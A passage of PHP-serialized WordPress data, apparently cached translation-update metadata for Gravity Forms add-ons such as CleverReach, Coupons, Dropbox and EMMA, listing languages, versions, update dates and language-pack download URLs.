"iso\";a:2:{i:0;s:2:\"hi\";i:1;s:3:\"hin\";}}s:2:\"it\";a:7:{s:8:\"language\";s:5:\"it_IT\";s:7:\"version\";s:5:\"1.7.1\";s:7:\"updated\";s:25:\"2023-01-06T17:05:43+00:00\";s:12:\"english_name\";s:7:\"Italian\";s:11:\"native_name\";s:8:\"Italiano\";s:7:\"package\";s:109:\"https://packages.translationspress.com/rocketgenius/gravityformscleverreach/gravityformscleverreach-it_IT.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"it\";i:1;s:3:\"ita\";}}s:2:\"ja\";a:7:{s:8:\"language\";s:2:\"ja\";s:7:\"version\";s:5:\"1.7.1\";s:7:\"updated\";s:25:\"2023-03-14T17:45:38+00:00\";s:12:\"english_name\";s:8:\"Japanese\";s:11:\"native_name\";s:9:\"日本語\";s:7:\"package\";s:106:\"https://packages.translationspress.com/rocketgenius/gravityformscleverreach/gravityformscleverreach-ja.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"ja\";}}s:2:\"pl\";a:7:{s:8:\"language\";s:5:\"pl_PL\";s:7:\"version\";s:5:\"1.7.1\";s:7:\"updated\";s:25:\"2023-01-06T17:05:56+00:00\";s:12:\"english_name\";s:6:\"Polish\";s:11:\"native_name\";s:6:\"Polski\";s:7:\"package\";s:109:\"https://packages.translationspress.com/rocketgenius/gravityformscleverreach/gravityformscleverreach-pl_PL.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"pl\";i:1;s:3:\"pol\";}}s:5:\"pt-br\";a:7:{s:8:\"language\";s:5:\"pt_BR\";s:7:\"version\";s:5:\"1.7.1\";s:7:\"updated\";s:25:\"2020-12-17T15:03:13+00:00\";s:12:\"english_name\";s:19:\"Portuguese (Brazil)\";s:11:\"native_name\";s:20:\"Português do Brasil\";s:7:\"package\";s:109:\"https://packages.translationspress.com/rocketgenius/gravityformscleverreach/gravityformscleverreach-pt_BR.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"pt\";i:1;s:3:\"por\";}}s:2:\"pt\";a:7:{s:8:\"language\";s:5:\"pt_PT\";s:7:\"version\";s:5:\"1.7.1\";s:7:\"updated\";s:25:\"2020-12-17T15:55:14+00:00\";s:12:\"english_name\";s:21:\"Portuguese (Portugal)\";s:11:\"native_name\";s:10:\"Português\";s:7:\"package\";s:109:\"https://packages.translationspress.com/rocketgenius/gravityformscleverreach/gravityformscleverreach-pt_PT.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"pt\";}}s:2:\"ru\";a:7:{s:8:\"language\";s:5:\"ru_RU\";s:7:\"version\";s:5:\"1.7.1\";s:7:\"updated\";s:25:\"2023-01-06T17:06:04+00:00\";s:12:\"english_name\";s:7:\"Russian\";s:11:\"native_name\";s:14:\"Русский\";s:7:\"package\";s:109:\"https://packages.translationspress.com/rocketgenius/gravityformscleverreach/gravityformscleverreach-ru_RU.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"ru\";i:1;s:3:\"rus\";}}s:2:\"es\";a:7:{s:8:\"language\";s:5:\"es_ES\";s:7:\"version\";s:5:\"1.7.1\";s:7:\"updated\";s:25:\"2023-01-06T17:05:23+00:00\";s:12:\"english_name\";s:15:\"Spanish (Spain)\";s:11:\"native_name\";s:8:\"Español\";s:7:\"package\";s:109:\"https://packages.translationspress.com/rocketgenius/gravityformscleverreach/gravityformscleverreach-es_ES.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"es\";i:1;s:3:\"spa\";i:2;s:3:\"spa\";}}s:2:\"sv\";a:7:{s:8:\"language\";s:5:\"sv_SE\";s:7:\"version\";s:5:\"1.7.1\";s:7:\"updated\";s:25:\"2020-10-21T17:59:57+00:00\";s:12:\"english_name\";s:7:\"Swedish\";s:11:\"native_name\";s:7:\"Svenska\";s:7:\"package\";s:109:\"https://packages.translationspress.com/rocketgenius/gravityformscleverreach/gravityformscleverreach-sv_SE.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"sv\";i:1;s:3:\"swe\";}}s:2:\"tr\";a:7:{s:8:\"language\";s:5:\"tr_TR\";s:7:\"version\";s:5:\"1.7.1\";s:7:\"updated\";s:25:\"2023-01-06T17:06:10+00:00\";s:12:\"english_name\";s:7:\"Turkish\";s:11:\"native_name\";s:8:\"Türkçe\";s:7:\"package\";s:109:\"https://packages.translationspress.com/rocketgenius/gravityformscleverreach/gravityformscleverreach-tr_TR.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"tr\";i:1;s:3:\"tur\";}}s:2:\"uk\";a:7:{s:8:\"language\";s:2:\"uk\";s:7:\"version\";s:5:\"1.7.1\";s:7:\"updated\";s:25:\"2022-06-27T09:55:53+00:00\";s:12:\"english_name\";s:9:\"Ukrainian\";s:11:\"native_name\";s:20:\"Українська\";s:7:\"package\";s:106:\"https://packages.translationspress.com/rocketgenius/gravityformscleverreach/gravityformscleverreach-uk.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"uk\";i:1;s:3:\"ukr\";}}}}s:19:\"gravityformscoupons\";a:1:{s:12:\"translations\";a:21:{s:5:\"zh-cn\";a:7:{s:8:\"language\";s:5:\"zh_CN\";s:7:\"version\";s:3:\"3.1\";s:7:\"updated\";s:25:\"2022-06-23T19:14:14+00:00\";s:12:\"english_name\";s:15:\"Chinese (China)\";s:11:\"native_name\";s:12:\"简体中文\";s:7:\"package\";s:101:\"https://packages.translationspress.com/rocketgenius/gravityformscoupons/gravityformscoupons-zh_CN.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"zh\";i:1;s:3:\"zho\";}}s:2:\"da\";a:7:{s:8:\"language\";s:5:\"da_DK\";s:7:\"version\";s:3:\"3.1\";s:7:\"updated\";s:25:\"2022-06-23T19:13:22+00:00\";s:12:\"english_name\";s:6:\"Danish\";s:11:\"native_name\";s:5:\"Dansk\";s:7:\"package\";s:101:\"https://packages.translationspress.com/rocketgenius/gravityformscoupons/gravityformscoupons-da_DK.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"da\";i:1;s:3:\"dan\";}}s:2:\"nl\";a:7:{s:8:\"language\";s:5:\"nl_NL\";s:7:\"version\";s:3:\"3.1\";s:7:\"updated\";s:25:\"2023-03-05T09:29:49+00:00\";s:12:\"english_name\";s:5:\"Dutch\";s:11:\"native_name\";s:10:\"Nederlands\";s:7:\"package\";s:101:\"https://packages.translationspress.com/rocketgenius/gravityformscoupons/gravityformscoupons-nl_NL.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"nl\";i:1;s:3:\"nld\";}}s:5:\"en-au\";a:7:{s:8:\"language\";s:5:\"en_AU\";s:7:\"version\";s:3:\"3.1\";s:7:\"updated\";s:25:\"2022-06-27T08:34:12+00:00\";s:12:\"english_name\";s:19:\"English (Australia)\";s:11:\"native_name\";s:19:\"English (Australia)\";s:7:\"package\";s:101:\"https://packages.translationspress.com/rocketgenius/gravityformscoupons/gravityformscoupons-en_AU.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"en\";i:1;s:3:\"eng\";i:2;s:3:\"eng\";}}s:5:\"en-gb\";a:7:{s:8:\"language\";s:5:\"en_GB\";s:7:\"version\";s:3:\"3.1\";s:7:\"updated\";s:25:\"2022-03-15T13:30:44+00:00\";s:12:\"english_name\";s:12:\"English (UK)\";s:11:\"native_name\";s:12:\"English (UK)\";s:7:\"package\";s:101:\"https://packages.translationspress.com/rocketgenius/gravityformscoupons/gravityformscoupons-en_GB.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"en\";i:1;s:3:\"eng\";i:2;s:3:\"eng\";}}s:2:\"fi\";a:7:{s:8:\"language\";s:2:\"fi\";s:7:\"version\";s:3:\"3.1\";s:7:\"updated\";s:25:\"2022-06-23T19:13:43+00:00\";s:12:\"english_name\";s:7:\"Finnish\";s:11:\"native_name\";s:5:\"Suomi\";s:7:\"package\";s:98:\"https://packages.translationspress.com/rocketgenius/gravityformscoupons/gravityformscoupons-fi.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"fi\";i:1;s:3:\"fin\";}}s:5:\"fr-ca\";a:7:{s:8:\"language\";s:5:\"fr_CA\";s:7:\"version\";s:3:\"3.1\";s:7:\"updated\";s:25:\"2019-12-10T12:39:35+00:00\";s:12:\"english_name\";s:15:\"French (Canada)\";s:11:\"native_name\";s:19:\"Français du Canada\";s:7:\"package\";s:101:\"https://packages.translationspress.com/rocketgenius/gravityformscoupons/gravityformscoupons-fr_CA.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"fr\";i:1;s:3:\"fra\";}}s:2:\"fr\";a:7:{s:8:\"language\";s:5:\"fr_FR\";s:7:\"version\";s:3:\"3.1\";s:7:\"updated\";s:25:\"2023-03-10T11:17:44+00:00\";s:12:\"english_name\";s:15:\"French (France)\";s:11:\"native_name\";s:9:\"Français\";s:7:\"package\";s:101:\"https://packages.translationspress.com/rocketgenius/gravityformscoupons/gravityformscoupons-fr_FR.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"fr\";}}s:2:\"de\";a:7:{s:8:\"language\";s:5:\"de_DE\";s:7:\"version\";s:3:\"3.1\";s:7:\"updated\";s:25:\"2020-11-04T17:00:33+00:00\";s:12:\"english_name\";s:6:\"German\";s:11:\"native_name\";s:7:\"Deutsch\";s:7:\"package\";s:101:\"https://packages.translationspress.com/rocketgenius/gravityformscoupons/gravityformscoupons-de_DE.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"de\";}}s:2:\"he\";a:7:{s:8:\"language\";s:5:\"he_IL\";s:7:\"version\";s:3:\"3.1\";s:7:\"updated\";s:25:\"2023-01-06T17:06:49+00:00\";s:12:\"english_name\";s:6:\"Hebrew\";s:11:\"native_name\";s:16:\"עִבְרִית\";s:7:\"package\";s:101:\"https://packages.translationspress.com/rocketgenius/gravityformscoupons/gravityformscoupons-he_IL.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"he\";}}s:2:\"hi\";a:7:{s:8:\"language\";s:5:\"hi_IN\";s:7:\"version\";s:3:\"3.1\";s:7:\"updated\";s:25:\"2023-03-05T09:16:54+00:00\";s:12:\"english_name\";s:5:\"Hindi\";s:11:\"native_name\";s:18:\"हिन्दी\";s:7:\"package\";s:101:\"https://packages.translationspress.com/rocketgenius/gravityformscoupons/gravityformscoupons-hi_IN.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"hi\";i:1;s:3:\"hin\";}}s:2:\"it\";a:7:{s:8:\"language\";s:5:\"it_IT\";s:7:\"version\";s:3:\"3.1\";s:7:\"updated\";s:25:\"2023-03-16T12:10:32+00:00\";s:12:\"english_name\";s:7:\"Italian\";s:11:\"native_name\";s:8:\"Italiano\";s:7:\"package\";s:101:\"https://packages.translationspress.com/rocketgenius/gravityformscoupons/gravityformscoupons-it_IT.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"it\";i:1;s:3:\"ita\";}}s:2:\"ja\";a:7:{s:8:\"language\";s:2:\"ja\";s:7:\"version\";s:3:\"3.1\";s:7:\"updated\";s:25:\"2023-03-23T05:04:47+00:00\";s:12:\"english_name\";s:8:\"Japanese\";s:11:\"native_name\";s:9:\"日本語\";s:7:\"package\";s:98:\"https://packages.translationspress.com/rocketgenius/gravityformscoupons/gravityformscoupons-ja.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"ja\";}}s:2:\"nb\";a:7:{s:8:\"language\";s:5:\"nb_NO\";s:7:\"version\";s:3:\"3.1\";s:7:\"updated\";s:25:\"2022-06-27T09:38:39+00:00\";s:12:\"english_name\";s:19:\"Norwegian (Bokmål)\";s:11:\"native_name\";s:13:\"Norsk bokmål\";s:7:\"package\";s:101:\"https://packages.translationspress.com/rocketgenius/gravityformscoupons/gravityformscoupons-nb_NO.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"nb\";i:1;s:3:\"nob\";}}s:2:\"pl\";a:7:{s:8:\"language\";s:5:\"pl_PL\";s:7:\"version\";s:3:\"3.1\";s:7:\"updated\";s:25:\"2021-09-14T09:30:05+00:00\";s:12:\"english_name\";s:6:\"Polish\";s:11:\"native_name\";s:6:\"Polski\";s:7:\"package\";s:101:\"https://packages.translationspress.com/rocketgenius/gravityformscoupons/gravityformscoupons-pl_PL.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"pl\";i:1;s:3:\"pol\";}}s:5:\"pt-br\";a:7:{s:8:\"language\";s:5:\"pt_BR\";s:7:\"version\";s:3:\"3.1\";s:7:\"updated\";s:25:\"2023-03-12T14:45:30+00:00\";s:12:\"english_name\";s:19:\"Portuguese (Brazil)\";s:11:\"native_name\";s:20:\"Português do Brasil\";s:7:\"package\";s:101:\"https://packages.translationspress.com/rocketgenius/gravityformscoupons/gravityformscoupons-pt_BR.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"pt\";i:1;s:3:\"por\";}}s:2:\"pt\";a:7:{s:8:\"language\";s:5:\"pt_PT\";s:7:\"version\";s:3:\"3.1\";s:7:\"updated\";s:25:\"2023-03-11T16:33:20+00:00\";s:12:\"english_name\";s:21:\"Portuguese (Portugal)\";s:11:\"native_name\";s:10:\"Português\";s:7:\"package\";s:101:\"https://packages.translationspress.com/rocketgenius/gravityformscoupons/gravityformscoupons-pt_PT.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"pt\";}}s:2:\"ru\";a:7:{s:8:\"language\";s:5:\"ru_RU\";s:7:\"version\";s:3:\"3.1\";s:7:\"updated\";s:25:\"2023-03-15T00:41:04+00:00\";s:12:\"english_name\";s:7:\"Russian\";s:11:\"native_name\";s:14:\"Русский\";s:7:\"package\";s:101:\"https://packages.translationspress.com/rocketgenius/gravityformscoupons/gravityformscoupons-ru_RU.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"ru\";i:1;s:3:\"rus\";}}s:2:\"es\";a:7:{s:8:\"language\";s:5:\"es_ES\";s:7:\"version\";s:3:\"3.1\";s:7:\"updated\";s:25:\"2023-01-06T17:06:36+00:00\";s:12:\"english_name\";s:15:\"Spanish (Spain)\";s:11:\"native_name\";s:8:\"Español\";s:7:\"package\";s:101:\"https://packages.translationspress.com/rocketgenius/gravityformscoupons/gravityformscoupons-es_ES.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"es\";i:1;s:3:\"spa\";i:2;s:3:\"spa\";}}s:2:\"sv\";a:7:{s:8:\"language\";s:5:\"sv_SE\";s:7:\"version\";s:3:\"3.1\";s:7:\"updated\";s:25:\"2023-03-25T07:08:10+00:00\";s:12:\"english_name\";s:7:\"Swedish\";s:11:\"native_name\";s:7:\"Svenska\";s:7:\"package\";s:101:\"https://packages.translationspress.com/rocketgenius/gravityformscoupons/gravityformscoupons-sv_SE.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"sv\";i:1;s:3:\"swe\";}}s:2:\"tr\";a:7:{s:8:\"language\";s:5:\"tr_TR\";s:7:\"version\";s:3:\"3.1\";s:7:\"updated\";s:25:\"2023-03-06T09:04:36+00:00\";s:12:\"english_name\";s:7:\"Turkish\";s:11:\"native_name\";s:8:\"Türkçe\";s:7:\"package\";s:101:\"https://packages.translationspress.com/rocketgenius/gravityformscoupons/gravityformscoupons-tr_TR.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"tr\";i:1;s:3:\"tur\";}}}}s:19:\"gravityformsdropbox\";a:1:{s:12:\"translations\";a:20:{s:2:\"ca\";a:7:{s:8:\"language\";s:2:\"ca\";s:7:\"version\";s:3:\"3.1\";s:7:\"updated\";s:25:\"2022-06-23T19:13:15+00:00\";s:12:\"english_name\";s:7:\"Catalan\";s:11:\"native_name\";s:7:\"Català\";s:7:\"package\";s:98:\"https://packages.translationspress.com/rocketgenius/gravityformsdropbox/gravityformsdropbox-ca.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"ca\";i:1;s:3:\"cat\";}}s:2:\"da\";a:7:{s:8:\"language\";s:5:\"da_DK\";s:7:\"version\";s:3:\"3.1\";s:7:\"updated\";s:25:\"2022-06-23T19:13:22+00:00\";s:12:\"english_name\";s:6:\"Danish\";s:11:\"native_name\";s:5:\"Dansk\";s:7:\"package\";s:101:\"https://packages.translationspress.com/rocketgenius/gravityformsdropbox/gravityformsdropbox-da_DK.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"da\";i:1;s:3:\"dan\";}}s:2:\"nl\";a:7:{s:8:\"language\";s:5:\"nl_NL\";s:7:\"version\";s:3:\"3.1\";s:7:\"updated\";s:25:\"2021-09-13T12:16:26+00:00\";s:12:\"english_name\";s:5:\"Dutch\";s:11:\"native_name\";s:10:\"Nederlands\";s:7:\"package\";s:101:\"https://packages.translationspress.com/rocketgenius/gravityformsdropbox/gravityformsdropbox-nl_NL.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"nl\";i:1;s:3:\"nld\";}}s:5:\"en-au\";a:7:{s:8:\"language\";s:5:\"en_AU\";s:7:\"version\";s:3:\"3.1\";s:7:\"updated\";s:25:\"2022-06-27T08:34:12+00:00\";s:12:\"english_name\";s:19:\"English (Australia)\";s:11:\"native_name\";s:19:\"English (Australia)\";s:7:\"package\";s:101:\"https://packages.translationspress.com/rocketgenius/gravityformsdropbox/gravityformsdropbox-en_AU.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"en\";i:1;s:3:\"eng\";i:2;s:3:\"eng\";}}s:5:\"en-gb\";a:7:{s:8:\"language\";s:5:\"en_GB\";s:7:\"version\";s:3:\"3.1\";s:7:\"updated\";s:25:\"2022-06-27T08:56:15+00:00\";s:12:\"english_name\";s:12:\"English (UK)\";s:11:\"native_name\";s:12:\"English (UK)\";s:7:\"package\";s:101:\"https://packages.translationspress.com/rocketgenius/gravityformsdropbox/gravityformsdropbox-en_GB.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"en\";i:1;s:3:\"eng\";i:2;s:3:\"eng\";}}s:2:\"fi\";a:7:{s:8:\"language\";s:2:\"fi\";s:7:\"version\";s:3:\"3.1\";s:7:\"updated\";s:25:\"2023-01-06T17:07:52+00:00\";s:12:\"english_name\";s:7:\"Finnish\";s:11:\"native_name\";s:5:\"Suomi\";s:7:\"package\";s:98:\"https://packages.translationspress.com/rocketgenius/gravityformsdropbox/gravityformsdropbox-fi.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"fi\";i:1;s:3:\"fin\";}}s:2:\"fr\";a:7:{s:8:\"language\";s:5:\"fr_FR\";s:7:\"version\";s:3:\"3.1\";s:7:\"updated\";s:25:\"2021-10-25T16:33:03+00:00\";s:12:\"english_name\";s:15:\"French (France)\";s:11:\"native_name\";s:9:\"Français\";s:7:\"package\";s:101:\"https://packages.translationspress.com/rocketgenius/gravityformsdropbox/gravityformsdropbox-fr_FR.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"fr\";}}s:2:\"de\";a:7:{s:8:\"language\";s:5:\"de_DE\";s:7:\"version\";s:3:\"3.1\";s:7:\"updated\";s:25:\"2021-09-27T15:50:14+00:00\";s:12:\"english_name\";s:6:\"German\";s:11:\"native_name\";s:7:\"Deutsch\";s:7:\"package\";s:101:\"https://packages.translationspress.com/rocketgenius/gravityformsdropbox/gravityformsdropbox-de_DE.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"de\";}}s:2:\"he\";a:7:{s:8:\"language\";s:5:\"he_IL\";s:7:\"version\";s:3:\"3.1\";s:7:\"updated\";s:25:\"2022-06-27T08:56:26+00:00\";s:12:\"english_name\";s:6:\"Hebrew\";s:11:\"native_name\";s:16:\"עִבְרִית\";s:7:\"package\";s:101:\"https://packages.translationspress.com/rocketgenius/gravityformsdropbox/gravityformsdropbox-he_IL.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"he\";}}s:2:\"hi\";a:7:{s:8:\"language\";s:5:\"hi_IN\";s:7:\"version\";s:3:\"3.1\";s:7:\"updated\";s:25:\"2021-09-20T21:27:29+00:00\";s:12:\"english_name\";s:5:\"Hindi\";s:11:\"native_name\";s:18:\"हिन्दी\";s:7:\"package\";s:101:\"https://packages.translationspress.com/rocketgenius/gravityformsdropbox/gravityformsdropbox-hi_IN.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"hi\";i:1;s:3:\"hin\";}}s:2:\"it\";a:7:{s:8:\"language\";s:5:\"it_IT\";s:7:\"version\";s:3:\"3.1\";s:7:\"updated\";s:25:\"2021-09-27T07:06:04+00:00\";s:12:\"english_name\";s:7:\"Italian\";s:11:\"native_name\";s:8:\"Italiano\";s:7:\"package\";s:101:\"https://packages.translationspress.com/rocketgenius/gravityformsdropbox/gravityformsdropbox-it_IT.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"it\";i:1;s:3:\"ita\";}}s:2:\"ja\";a:7:{s:8:\"language\";s:2:\"ja\";s:7:\"version\";s:3:\"3.1\";s:7:\"updated\";s:25:\"2023-03-14T17:47:33+00:00\";s:12:\"english_name\";s:8:\"Japanese\";s:11:\"native_name\";s:9:\"日本語\";s:7:\"package\";s:98:\"https://packages.translationspress.com/rocketgenius/gravityformsdropbox/gravityformsdropbox-ja.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"ja\";}}s:2:\"nb\";a:7:{s:8:\"language\";s:5:\"nb_NO\";s:7:\"version\";s:3:\"3.1\";s:7:\"updated\";s:25:\"2022-06-27T09:38:39+00:00\";s:12:\"english_name\";s:19:\"Norwegian (Bokmål)\";s:11:\"native_name\";s:13:\"Norsk bokmål\";s:7:\"package\";s:101:\"https://packages.translationspress.com/rocketgenius/gravityformsdropbox/gravityformsdropbox-nb_NO.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"nb\";i:1;s:3:\"nob\";}}s:2:\"pl\";a:7:{s:8:\"language\";s:5:\"pl_PL\";s:7:\"version\";s:3:\"3.1\";s:7:\"updated\";s:25:\"2021-10-02T10:45:47+00:00\";s:12:\"english_name\";s:6:\"Polish\";s:11:\"native_name\";s:6:\"Polski\";s:7:\"package\";s:101:\"https://packages.translationspress.com/rocketgenius/gravityformsdropbox/gravityformsdropbox-pl_PL.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"pl\";i:1;s:3:\"pol\";}}s:5:\"pt-br\";a:7:{s:8:\"language\";s:5:\"pt_BR\";s:7:\"version\";s:3:\"3.1\";s:7:\"updated\";s:25:\"2021-09-28T17:59:38+00:00\";s:12:\"english_name\";s:19:\"Portuguese (Brazil)\";s:11:\"native_name\";s:20:\"Português do Brasil\";s:7:\"package\";s:101:\"https://packages.translationspress.com/rocketgenius/gravityformsdropbox/gravityformsdropbox-pt_BR.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"pt\";i:1;s:3:\"por\";}}s:2:\"pt\";a:7:{s:8:\"language\";s:5:\"pt_PT\";s:7:\"version\";s:3:\"3.1\";s:7:\"updated\";s:25:\"2021-09-27T21:56:25+00:00\";s:12:\"english_name\";s:21:\"Portuguese (Portugal)\";s:11:\"native_name\";s:10:\"Português\";s:7:\"package\";s:101:\"https://packages.translationspress.com/rocketgenius/gravityformsdropbox/gravityformsdropbox-pt_PT.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"pt\";}}s:2:\"ru\";a:7:{s:8:\"language\";s:5:\"ru_RU\";s:7:\"version\";s:3:\"3.1\";s:7:\"updated\";s:25:\"2021-09-27T15:58:55+00:00\";s:12:\"english_name\";s:7:\"Russian\";s:11:\"native_name\";s:14:\"Русский\";s:7:\"package\";s:101:\"https://packages.translationspress.com/rocketgenius/gravityformsdropbox/gravityformsdropbox-ru_RU.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"ru\";i:1;s:3:\"rus\";}}s:2:\"es\";a:7:{s:8:\"language\";s:5:\"es_ES\";s:7:\"version\";s:3:\"3.1\";s:7:\"updated\";s:25:\"2021-09-27T07:38:08+00:00\";s:12:\"english_name\";s:15:\"Spanish (Spain)\";s:11:\"native_name\";s:8:\"Español\";s:7:\"package\";s:101:\"https://packages.translationspress.com/rocketgenius/gravityformsdropbox/gravityformsdropbox-es_ES.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"es\";i:1;s:3:\"spa\";i:2;s:3:\"spa\";}}s:2:\"sv\";a:7:{s:8:\"language\";s:5:\"sv_SE\";s:7:\"version\";s:3:\"3.1\";s:7:\"updated\";s:25:\"2021-09-29T17:57:54+00:00\";s:12:\"english_name\";s:7:\"Swedish\";s:11:\"native_name\";s:7:\"Svenska\";s:7:\"package\";s:101:\"https://packages.translationspress.com/rocketgenius/gravityformsdropbox/gravityformsdropbox-sv_SE.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"sv\";i:1;s:3:\"swe\";}}s:2:\"tr\";a:7:{s:8:\"language\";s:5:\"tr_TR\";s:7:\"version\";s:3:\"3.1\";s:7:\"updated\";s:25:\"2021-09-16T16:53:01+00:00\";s:12:\"english_name\";s:7:\"Turkish\";s:11:\"native_name\";s:8:\"Türkçe\";s:7:\"package\";s:101:\"https://packages.translationspress.com/rocketgenius/gravityformsdropbox/gravityformsdropbox-tr_TR.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"tr\";i:1;s:3:\"tur\";}}}}s:16:\"gravityformsemma\";a:1:{s:12:\"translations\";a:25:{s:2:\"ca\";a:7:{s:8:\"language\";s:2:\"ca\";s:7:\"version\";s:5:\"1.5.2\";s:7:\"updated\";s:25:\"2023-02-20T14:31:14+00:00\";s:12:\"english_name\";s:7:\"Catalan\";s:11:\"native_name\";s:7:\"Català\";s:7:\"package\";s:92:\"https://packages.translationspress.com/rocketgenius/gravityformsemma/gravityformsemma-ca.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"ca\";i:1;s:3:\"cat\";}}s:5:\"zh-cn\";a:7:{s:8:\"language\";s:5:\"zh_CN\";s:7:\"version\";s:5:\"1.5.2\";s:7:\"updated\";s:25:\"2023-01-06T17:09:41+00:00\";s:12:\"english_name\";s:15:\"Chinese (China)\";s:11:\"native_name\";s:12:\"简体中文\";s:7:\"package\";s:95:\"https://packages.translationspress.com/rocketgenius/gravityformsemma/gravityformsemma-zh_CN.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"zh\";i:1;s:3:\"zho\";}}s:5:\"zh-hk\";a:7:{s:8:\"language\";s:5:\"zh_HK\";s:7:\"version\";s:5:\"1.5.2\";s:7:\"updated\";s:25:\"2023-03-02T20:39:07+00:00\";s:12:\"english_name\";s:19:\"Chinese (Hong Kong)\";s:11:\"native_name\";s:16:\"香港中文版	\";s:7:\"package\";s:95:\"https://packages.translationspress.com/rocketgenius/gravityformsemma/gravityformsemma-zh_HK.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"zh\";i:1;s:3:\"zho\";}}s:2:\"da\";a:7:{s:8:\"language\";s:5:\"da_DK\";s:7:\"version\";s:5:\"1.5.2\";s:7:\"updated\";s:25:\"2023-01-06T17:08:42+00:00\";s:12:\"english_name\";s:6:\"Danish\";s:11:\"native_name\";s:5:\"Dansk\";s:7:\"package\";s:95:\"https://packages.translationspress.com/rocketgenius/gravityformsemma/gravityformsemma-da_DK.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"da\";i:1;s:3:\"dan\";}}s:2:\"nl\";a:7:{s:8:\"language\";s:5:\"nl_NL\";s:7:\"version\";s:5:\"1.5.2\";s:7:\"updated\";s:25:\"2023-01-06T17:09:22+00:00\";s:12:\"english_name\";s:5:\"Dutch\";s:11:\"native_name\";s:10:\"Nederlands\";s:7:\"package\";s:95:\"https://packages.translationspress.com/rocketgenius/gravityformsemma/gravityformsemma-nl_NL.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"nl\";i:1;s:3:\"nld\";}}s:5:\"en-au\";a:7:{s:8:\"language\";s:5:\"en_AU\";s:7:\"version\";s:5:\"1.5.2\";s:7:\"updated\";s:25:\"2022-06-27T08:34:12+00:00\";s:12:\"english_name\";s:19:\"English (Australia)\";s:11:\"native_name\";s:19:\"English (Australia)\";s:7:\"package\";s:95:\"https://packages.translationspress.com/rocketgenius/gravityformsemma/gravityformsemma-en_AU.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"en\";i:1;s:3:\"eng\";i:2;s:3:\"eng\";}}s:5:\"en-gb\";a:7:{s:8:\"language\";s:5:\"en_GB\";s:7:\"version\";s:5:\"1.5.2\";s:7:\"updated\";s:25:\"2022-03-15T13:30:44+00:00\";s:12:\"english_name\";s:12:\"English (UK)\";s:11:\"native_name\";s:12:\"English (UK)\";s:7:\"package\";s:95:\"https://packages.translationspress.com/rocketgenius/gravityformsemma/gravityformsemma-en_GB.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"en\";i:1;s:3:\"eng\";i:2;s:3:\"eng\";}}s:2:\"fi\";a:7:{s:8:\"language\";s:2:\"fi\";s:7:\"version\";s:5:\"1.5.2\";s:7:\"updated\";s:25:\"2023-01-06T17:08:58+00:00\";s:12:\"english_name\";s:7:\"Finnish\";s:11:\"native_name\";s:5:\"Suomi\";s:7:\"package\";s:92:\"https://packages.translationspress.com/rocketgenius/gravityformsemma/gravityformsemma-fi.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"fi\";i:1;s:3:\"fin\";}}s:5:\"fr-ca\";a:7:{s:8:\"language\";s:5:\"fr_CA\";s:7:\"version\";s:5:\"1.5.2\";s:7:\"updated\";s:25:\"2023-03-02T20:38:52+00:00\";s:12:\"english_name\";s:15:\"French (Canada)\";s:11:\"native_name\";s:19:\"Français du Canada\";s:7:\"package\";s:95:\"https://packages.translationspress.com/rocketgenius/gravityformsemma/gravityformsemma-fr_CA.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"fr\";i:1;s:3:\"fra\";}}s:2:\"fr\";a:7:{s:8:\"language\";s:5:\"fr_FR\";s:7:\"version\";s:5:\"1.5.2\";s:7:\"updated\";s:25:\"2022-06-27T08:57:24+00:00\";s:12:\"english_name\";s:15:\"French 